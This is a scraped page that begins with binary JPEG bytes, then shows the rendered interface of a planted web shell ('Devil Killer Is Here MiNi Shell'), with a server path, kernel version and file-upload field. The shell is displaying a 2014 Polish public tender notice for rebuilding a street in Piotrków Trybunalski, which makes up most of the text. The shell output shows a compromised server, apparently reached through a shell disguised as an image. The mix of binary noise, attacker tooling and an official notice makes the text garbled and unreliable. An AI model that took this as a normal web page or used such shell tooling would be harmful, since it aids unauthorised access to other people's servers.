JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141001/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141001/324452-N-2014.html

<p class="kh_header"><b>Piotrków Trybunalski: PRZEBUDOWA UL. WOJSKA POLSKIEGO NA ODCINKU OD ULICY P.O.W. DO UL. TORUŃSKIEJ</b><br>
<b>Numer ogłoszenia: 324452 - 2014; data zamieszczenia: 01.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Piotrków Trybunalski , ul. Pasaż Rudowskiego 10, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 044 7327796, faks 044 7327798.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.piotrkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEBUDOWA UL. WOJSKA POLSKIEGO NA ODCINKU OD ULICY P.O.W. DO UL. TORUŃSKIEJ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:

PRZEBUDOWA UL. WOJSKA POLSKIEGO NA ODCINKU OD ULICY POW DO ULICY TORUŃSKIEJ W PIOTRKOWIE TRYBUNALSKIM

Informacje ogóle
W celu poprawy funkcjonalności ul. Wojska Polskiego realizowana jest przebudowa obiektu drogowego opartego na założeniach dostosowania parametrów geometrycznych jezdni do maksymalizacji komfortu jazdy w powiązaniu z projektowanym systemem odwodnienia.
Inwestor: Miasto Piotrków Trybunalski, Pasaż Karola Rudowskiego 10; 97-300 Piotrków Trybunalski.
Adres inwestycji: ul. Wojska Polskiego (na odcinku od ul. POW do ul. Toruńskiej) działki o Nr ewid.: 43/1, 43/2, 72/3, 72/4, 12, 97/1, 42 i 125 obręb 22 w Piotrkowie Trybunalskim.

Parametry inwestycji:
- Własność terenu pod inwestycje Gmina Miasto Piotrków Trybunalski
- Klasa drogi				            		L
- Prędkość projektowa					50km/h
- Kategoria obciążenia ruchem				KR3
- Długość drogi				            		418,00mb
- Chodnik i Zjazdy 						istniejące chodniki i zjazdy dostosować							do niwelety nowych krawężników	
- Sieci kanalizacji deszczowej	                    		204,00mb
- Przykanaliki K.D.						414,30mb
- Przyłącze K.S. szt. 1					7,80mb 
- Sieć wodociągowa				           	446,70mb
- Przyłącza wodociągowe szt. 27				164,00mb
- Kolizje zabezpieczenie istniejącą infrastruktury niezależnymi rurami osłonowymi 	
Zakres rzeczowy robót obejmuje:

1.ROBOTY DROGOWE:

Zakres robót
Zakres robót drogowych obejmuje remont jezdni w szerokości istniejącej oraz dostosowanie istniejących chodników i zjazdów bez zmiany do niwelety nowego krawężnika; 
1.Roboty rozbiórkowe
2.Roboty ziemne
3.Krawężniki 
4.Nawierzchnia jezdni drogi gminnej 
5.Chodniki i Zjazdy (dostosowanie wysokości do niwelety nowych krawężników)
6.Organizacja ruchu
7.Oznakowanie na czas robót

Składowe przebudowy pasa drogowego w zakresie robót drogowych:
1. Jezdnia o nawierzchni min.-bit.powierzchnia remontu 	4 068,34m2 
2.Krawężnik uliczny do remontu o długości 		          814,80mb

Konstrukcja remontowanej jezdni:
1.Przekrój uliczny
2.Warstwa ścieralna min.-bit. gr. 5cm z mieszanki SMA 11 70/100
3.Warstwa wyrównawcza min.-bit. gr. 3cm z mieszanki MMA AC 16 W 70/100 z zatopioną  geosiatką (siatka szklana o wytrzymałości 50 kN/m)

Roboty należy wykonać ściśle wg projektu oraz zgodnie ze Szczegółową Specyfikacją Techniczną wykonania i odbioru robót.

2. ROBOTY INSTALACYJNE:

2.1.Zakres robót 
Zakres robót instalacyjnych obejmuje budowę sieci kanalizacji deszczowej O 0,30 m wraz z przyłączami O 0,20 i O 0,25 m, wymianę sieci wodociągowej O 0,15 m wraz z przyłączami do posesji oraz budowę przyłącza kanalizacji sanitarnej O 0,15m.

2.2. Kanalizacja deszczowa
2.2.1. Sieć kanalizacji deszczowej  z rur PVC-U SN8 SDR 34 
DN 315x9,2mm klasy S							L=204,00m
2.2.2. Przykanaliki do wpustów ulicznych z rur PVC-U SN8 SDR 34 
DN 250x7,3mm klasy S  						L=100,70m 
2.2.3. Przykanaliki kanalizacji deszczowej rur PVC DN 200x5,9mm 	  	L= 313,60m   
2.2.4.Wpusty uliczne żelbet. DN 500 z osadnikiem zwieńczone żeliwną 
nasadą jezdniową klasy D 400, uszczelnienie wtopione w korpus	szt. 29 
2.2.5. Studnie żelbet. DN 1000 z włazem kanałowym żeliwnym o O 600
	klasy D400 z wypełnieniem bet., uszczelnienie wtopione w korpus szt. 8
 
2.3. Sieć wodociągowa
2.3.1.Sieć wodociągowa z żeliwa sferoidalnego O 150				L=426,00m
2.3.2.Sieć wodociągowa z żeliwa sferoidalnego O 100				L=20,70m
2.3.3.Zasuwa sieciowa wraz z obudową O 150 mm				8 kpl.
2.3.4.Hydrant ppoż. O 100mm z zasuwą i obudową - podziemny		3 kpl. 

2.4. Przyłącza wodociągowe (razem szt. 27 o łącznej długości 164,00m)
2.4.1.PE 100RC, SDR11, PN16 DN 40x3,7mm 				szt. 6	L=31,50m
2.4.2. PE 100RC, SDR11, PN16 DN 63x5,8mm 				szt. 18	L=124,70m
2.4.3.PE 100RC, SDR11, PN16 DN 90x8,2mm (podł. Hydrantów) 	szt. 3	L=7,80m

2.5. Przyłącze kanalizacji sanitarnej
2.5.1.PVC-U SDR 34-SN8 DN 160x4,7mm klasy S		           	szt. 1	L=7,80m

Kanał deszczowy należy wykonać z rur litych PVC-U SN8 SDR 34 DN 315x9,2mm klasy S, przykanaliki z rur litych  PVC-U SN8 SDR 34 DN 250x7,3mm oraz 200x5,9mm klasy S. Rury powinny posiadać Aprobatę Techniczną COBRTI INSTAL oraz Aprobatę Techniczną IBDiM. Należy przeprowadzić próbę szczelności kanału zgodnie z PN-EN 1610:2002. Wpusty deszczowe (29 szt.) o konstrukcji żelbetowej z prefabrykowanych elementów żelbetowych DN 500mm z betonu klasy nie niższej niż C35/45 z dnem szczelnym, zwieńczonym żelbetową nasadą jezdniową klasy D 400 (zgodnie z PN-EN 124:2000 oraz europejską DIN 4052). Wpusty deszczowe z osadnikiem o głębokości czynnej 100cm (objętość 0,196m3). Przejście rury przez ściankę studzienki wpustu deszczowego wykonać przy wykorzystaniu przejścia szczelnego, zamontowanego w elementach żelbetowych studni na etapie produkcji prefabrykatów. Prefabrykaty powinny posiadać  Aprobatę Techniczną COBRTI INSTAL oraz Aprobatę Techniczną IBDiM. Studnie kanalizacyjne należy wykonać z prefabrykowanych elementów żelbetowych i betonowych o średnicy O 1,0m z betonu klasy C35/45. Przykrycie studni włazem kanałowym żeliwnym  o średnicy O 600mm klasy D400 z wypełnieniem betonowym. Kręgi łączone za pomocą uszczelek. W studniach zamocować stopnie włazowe. Studnie D2 i D5 zaprojektowano jako studnie dodatkowe na istniejącym kanale deszczowym. Kanał ten jest na tym odcinku wyłożony od wewnątrz wykładziną z żywic poliestrowych przez firmę INFRA. Studnie należy wykonać zgodnie z warunkami technicznymi wydanymi przez firmę INFRA. Przed rozpoczęciem prac budowlanych należy pisemnie powiadomić firmę INFRA S.A. minimum z 14-dniowym wyprzedzeniem o zamiarze rozpoczęcia prac. Rzędne włazów studni powinny być równe rzędnym nawierzchni. Istniejące rury spustowe należy podłączyć do kanalizacji za pomocą podrynników O 150mm i wyprowadzić rury żeliwne na wysokość 1,0m nad poziom chodnika. Zamontować osadniki deszczowe żeliwne O 150mm. Elementy żelbetowe zabezpieczyć wg normy PN-61/B-06253. Należy zabezpieczyć istniejące przewody teletechniczne oraz energetyczne NN i WN w miejscach skrzyżowań z projektowaną siecią i przyłączami niezależną dwudzielną rurą osłonową. Stary żeliwny wodociąg należy wymienić na nowy z rur z żeliwa sferoidalnego o połączeniach kielichowych i średnicy O 150mm. Rury powinny posiadać zabezpieczenie wewnętrzne w postaci wykładziny cementowej zgodnie z PN-EN 545  oraz zabezpieczenie zewnętrzne powłoką z mieszaniny cynk - aluminium (Zn+Al) i żywicą epoksydową. Przyłącza wodociągowe wykonać z rur PE100RC, SDR11, PN16 DN 470x3,7mm, 63x5,8mm oraz 90x8,2mm. Włączenie do sieci wodociągowej wykonać z zastosowaniem nawiertak NWZ. Przy włączeniu do wodociągu zamontować zasuwę żeliwną bezgniazdową z żeliwa sferoidalnego PN16 z obudową teleskopową. Przyłącze kanalizacji sanitarnej należy wykonać w obrębie pasa drogowego w celu odprowadzenia ścieków sanitarnych z działki o nr ewid. 26 do istniejącej studzienki na kanale O 250mm w ulicy Wojska Polskiego, z rur litych PVC-U SDR 34-SN8 DN 160x4,7mm klasy S. 

3. ROBOTY ELEKTRYCZNE: 

3.1. Zakres robót.
Zakres robót elektrycznych obejmuje zabezpieczenie kolizji z istniejącą infrastrukturą podziemną w postaci przewodów teletechnicznych oraz energetycznych NN i WN w miejscach skrzyżowań z projektowaną  siecią i przyłączami za pomocą niezależnych, dwudzielnych rur osłonowych Arota  A110/PS i A160/PS o łącznej długości L=120m. Roboty ziemne należy prowadzić ręcznie pod nadzorem gestora odpowiedniej sieci.

Uwagi końcowe
Przy wykonywania prac należy zwrócić uwagę na istniejące urządzenia inżynieryjno - techniczne naziemne i podziemne oraz uwzględnić warunki podane przy uzgodnieniach branżowych projektu. 
Przed rozpoczęciem robót należy powiadomić pisemnie właścicieli tych urządzeń o zamiarze wykonywania prac w ich sąsiedztwie w celu sprawowania nadzoru.
Całość robót należy wykonać zgodnie z obowiązującymi przepisami i normami podanymi na wstępie.
Przestrzegać przepisów BHP.
Wykonawca w ramach swojego wynagrodzenia własnym staraniem i nakładem kosztów uzyskuje obsługę przez PGE S.A.

W wycenie należy uwzględnić również:

a)Roboty pomiarowe, cięcie nawierzchni, rozbiórkowe, wywóz gruzu na składowisko Wykonawcy,
b)Wykopy wąskoprzestrzenne o pionowych ścianach, w pełni umocnione,
c)Pełna wymiana gruntu pod terenami utwardzonymi - jezdnie, chodniki, zjazdy,
d)Odtworzenie nawierzchni, w tym nawierzchni gruntowych i bitumicznych, po wykonywanych pracach, jak również podczas używania ciężkiego sprzętu, roboty ziemne wykonać zgodnie z wymogami podanymi w normie PN-S-02205 (1998r.)
e)Zabezpieczenie istniejącego uzbrojenia rurami osłonowymi oraz bieżące ich inwentaryzowanie na trasie budowanych sieci,
f)W wycenie budowy kanalizacji deszczowej uwzględnić koszty związane z próbą wodną ułożonych kanałów.
g)Przeprowadzenie kamerą inspekcyjną inspekcji wszystkich wykonanych kanałów i przykanalików po ich ułożeniu oraz przed wykonywaniem warstw bitumicznych, dołączenie raportu do dokumentów odbiorowych (Koszt ułożenia kanałów deszczowych wycenić wraz  z ceną ich podwójnej inspekcji).
h)W wycenie przebudowy sieci wodociągowej uwzględnić koszty związane z wykonaniem niezbędnych badań, prób, dezynfekcji itp.,
i)Oznakowanie ulic na czas budowy jak również wykonanie docelowego oznakowania ulic.

W zakres przedmiotu zamówienia wchodzi także:
1)Zapewnienie kompleksowej obsługi geodezyjnej inwestycji oraz wykonanie geodezyjnej inwentaryzacji powykonawczej przez uprawnionego geodetę, opracowanie dokumentacji powykonawczej w 4 egzemplarzach w każdej branży, na koszt własny,
2)Uzyskanie koniecznych zezwoleń i uiszczenie opłat u zarządcy dróg na zajęcie pasa drogowego na czas robót,
3)Właściwe oznakowanie dróg na czas budowy, zgodnie z zatwierdzonym projektem czasowej organizacji ruchu, zabezpieczenie wykopów przed dostępem osób trzecich, wykonanie przejść dla pieszych,
4)Dostarczenie, zainstalowanie i obsługa wszystkich tymczasowych urządzeń zabezpieczających takich jak: zapory, światła ostrzegawcze, sygnały, ogrodzenia, poręcze itp. niezbędne do ochrony robót, zapewniające bezpieczeństwo pojazdów i pieszych,
5)Zapewnienie dojść do posesji,
6)Odtworzenie nawierzchni dróg i wjazdów do stanu pierwotnego, a w przypadku, gdy projekt drogowy przewiduje inne niż dotychczasowe zagospodarowanie terenu - doprowadzenie do stanu projektowanego,
7)Wykonanie koniecznych badań zagęszczenia gruntu celem odtworzenia i odbudowy nawierzchni drogowych zgodnie z Polską Normą: Drogi samochodowe. Roboty ziemne. Wymagania i badania PN-S-02205. Wskaźniki zagęszczenia gruntu oznaczyć zgodnie z normą BN-77/8931-12,
8)Wykonawca odpowiada za ochronę instalacji na powierzchni ziemi i za urządzenia podziemne, takie jak rurociągi, kable itp. oraz uzyska od odpowiednich władz będących właścicielami tych urządzeń potwierdzenie informacji dostarczonych mu przez Zamawiającego w ramach planu ich lokalizacji. Wykonawca zapewni właściwe oznaczenie i  zabezpieczenie przed uszkodzeniem tych instalacji i urządzeń w czasie trwania budowy,
9)Wykonawca zobowiązany jest umieścić w swoim harmonogramie rezerwę czasową dla wszelkiego rodzaju robót, które mają być wykonane w zakresie przełożenia instalacji i urządzeń podziemnych na terenie budowy i powiadomić inspektora nadzoru i władze lokalne o zamiarze rozpoczęcia robót. O fakcie przypadkowego uszkodzenia tych instalacji Wykonawca bezzwłocznie powiadomi inspektora nadzoru i zainteresowane władze oraz będzie z nimi współpracował dostarczając wszelkiej pomocy potrzebnej przy dokonywaniu napraw. Wykonawca będzie odpowiadać za wszelkie spowodowane przez jego działania uszkodzenia instalacji na powierzchni ziemi i urządzeń podziemnych wykazanych w dokumentach przekazanych mu przez Zamawiającego.

UWAGA:  
Zamówienie  należy  wykonać  ściśle  wg  projektu oraz zgodnie ze Szczegółową Specyfikacją Techniczną wykonania i odbioru robót.

WYMAGANIA OGÓLNE WYKONANIA ROBÓT:

Przed przystąpieniem do przetargu należy dokonać wizji lokalnej obiektu w miejscu realizacji zamówienia
Wszystkie materiały użyte do budowy muszą posiadać: 
- Certyfikat na znak bezpieczeństwa wykazując, że zapewniono zgodność z kryteriami właściwych przepisów i dokumentów technicznych.
-Deklarację zgodności lub certyfikat zgodności z: Polską Normą, Normą Europejską lub Aprobatą Techniczną w przypadku wyrobów, dla których nie ustanowiono normy, jeżeli nie są objęte certyfikacją. 
Wyroby budowlane, które zostaną użyte przy realizacji zadania muszą zostać dopuszczone do stosowania w budownictwie i posiadać odpowiednie oznakowania B lub CE oraz załączoną informację o wyrobie.
Rozpoczęcie prac należy zgłosić do odpowiednich jednostek - gestorów sieci, celem poinformowania o w/w robotach i czasie ich trwania.
Włączenie wodociągu do sieci miejskiej wykonać w uzgodnieniu z PWiK Sp. z o.o. - ewentualne koszty pokrywa Wykonawca robót.
Koszty zabezpieczenia terenu budowy wchodzą w zakres umowny i nie podlegają odrębnej zapłacie.
Podczas realizacji robót Wykonawca będzie przestrzegać przepisów dotyczących bezpieczeństwa  i higieny pracy zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 6 lutego 2003r. w sprawie bezpieczeństwa i higieny pracy podczas wykonywania robót budowlanych (Dz. U. z 2003r. Nr 47, poz. 401).
Warunkiem koniecznym dla prawidłowego przygotowania oferty przetargowej jest zapoznanie się z dokumentacją techniczną dotyczącą przedmiotowego zamówienia oraz Specyfikacjami Technicznymi Wykonania i Odbioru Robót. 

Wyłoniony w niniejszym przetargu Wykonawca będzie zobowiązany do :
 I udzielenia na wykonane roboty rękojmi na okres min. 5 lat, licząc od dnia odbioru robót,
II zabezpieczenia występujących kolizji budowanej infrastruktury z siecią energetyczną (wykonanie przez elektryka z uprawnieniami w zakresie sieci elektro-energetycznych),
III zabezpieczenia przed naruszeniem lub zniszczeniem punktów osnowy geodezyjnej, a w przypadku ich zniszczenia - do odtworzenia na własny koszt pod nadzorem geodety,  
 IV załączenia do dokumentacji odbiorowej, najpóźniej w dniu odbioru, powykonawczą mapę inwentaryzacyjną, zawierającą w komplecie załącznik w postaci wykazu pomiarów, potwierdzoną przez uprawnionego geodetę. 
Ponadto Wykonawca zobowiązany jest:
1.do przedstawienia Zamawiającemu przed podpisaniem umowy, kosztorysów ofertowych wykonanych metodą uproszczoną, na każdą z wymienionych w istotnych postanowieniach umowy branż robót, będących podstawą sporządzenia oferty, 
2.do złożenia do akceptacji Zamawiającego, harmonogramu rzeczowo-finansowego realizacji robót w terminie siedmiu dni od podpisania umowy, 
1.oświadczenia o wykonywaniu robót siłami własnymi lub z udziałem podwykonawców, których odpowiednie dokumenty powinna zawierać oferta,
2.do wykonania i zainstalowania w widocznych miejscach dwóch banerów o wymiarach   2,00 x 1,00 m wg załączonego wzoru, w okresie od dnia przekazania placu budowy do dnia odbioru końcowego zadania inwestycyjnego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.20.00-0, 45.23.30.00-9, 45.20.00.00-5, 45.23.31.50-5, 74.27.41.00-1, 45.23.13.00-8, 45.23.20.00-2, 45.23.11.00-6, 45.23.11.10-9, 45.23.22.00-4, 45.23.23.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający żąda wniesienia wadium.
1.	Wykonawca zobowiązany jest do wniesienia wadium do dnia 17.10.2014r. do godz. 9:00 w wysokości 30.000,00 zł.
2.	Wadium może być wniesione w następujących formach:
             a)pieniądzu wpłaconym przelewem na rachunek bankowy GETIN NOBLE BANK S.A. KONTO DEPOZYTÓW: 58 1560 0013 2323 1404 1000 0003 Uwaga: Na poleceniu przelewu należy zamieścić adnotację: Wadium - PRZEBUDOWA UL. WOJSKA POLSKIEGO NA ODCINKU OD ULICY P.O.W. DO UL. TORUŃSKIEJ
  b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. (DZ. U. z 2007r. Nr 42 poz. 275) o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
3.	Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za wniesione w terminie tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że środki zostały zaksięgowane na koncie Zamawiającego przed upływem terminu składania ofert.
4.	Oryginał poręczeń i gwarancji należy przekazać za pokwitowaniem do Referatu Zamówień Publicznych w Urzędzie Miasta, do pokoju nr 317 przed terminem składania ofert, a do oferty załączyć kserokopię. 
5.	Wykonawca, który nie wniesie wadium w wyznaczonym terminie zostanie wykluczony. Terminowe wniesienie wadium (w każdej z dopuszczonych form jego wniesienia) Zamawiający sprawdzi w ramach własnych czynności proceduralnych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący posiadania wiedzy i doświadczenia, zamawiający uzna za spełniony w przypadku, gdy wykonawca:

a)wykaże co najmniej trzy zamówienia (wykonane w okresie pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie) odpowiadające rodzajem przedmiotowi niniejszego zamówienia tj. 
- wykonanie trzech robót polegających na budowie lub przebudowie drogi wraz z infrastrukturą towarzyszącą o wartości co najmniej 1.000.000,00zł brutto każda - wg załącznika nr  4;

b)załączy dokumenty potwierdzające, że roboty wyszczególnione w załączniku nr 4 zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Sposób dokonania oceny spełnienia wymaganych warunków:
- przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
- niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
Ocena spełniania powyższych warunków nastąpi na podstawie oświadczeń lub dokumentów zawartych w ofercie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący dysponowania odpowiednim potencjałem technicznym, zostanie przez zamawiającego uznany za spełniony w przypadku, gdy wykonawca wykaże i przedłoży:
b) oświadczenie że wyroby budowlane które zostaną użyte przy realizacji ww. zadania zostały dopuszczone do stosowania w budownictwie i posiadają odpowiednie oznakowania B lub CE oraz załączoną informację o wyrobie - wg załącznika nr 3.
Sposób dokonania oceny spełnienia wymaganych warunków:
- przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
- niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
Ocena spełniania powyższych warunków nastąpi na podstawie oświadczeń lub dokumentów zawartych w ofercie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia, zostanie przez zamawiającego uznany za spełniony w przypadku, gdy wykonawca wykaże i przedłoży: 

a) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych a także zakresu wykonywanych przez nie czynności - wg załącznika nr 3. Osoby te muszą posiadać:
- uprawnienia do pełnienia samodzielnej funkcji technicznej w budownictwie o specjalności: konstrukcyjno - budowlanej w zakresie budowy dróg, instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych oraz elektryczne w zakresie sieci i urządzeń elektrycznych. Zadanie w zakresie robót elektrycznych winien wykonywać zespół, którego członkowie muszą posiadać kwalifikacje w zakresie eksploatacji sieci E do 15 kV a kierownik robót musi mieć uprawnienia w zakresie dozoru D. 
Sposób dokonania oceny spełnienia wymaganych warunków:
- przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
- niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
Ocena spełniania powyższych warunków nastąpi na podstawie oświadczeń lub dokumentów zawartych w ofercie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
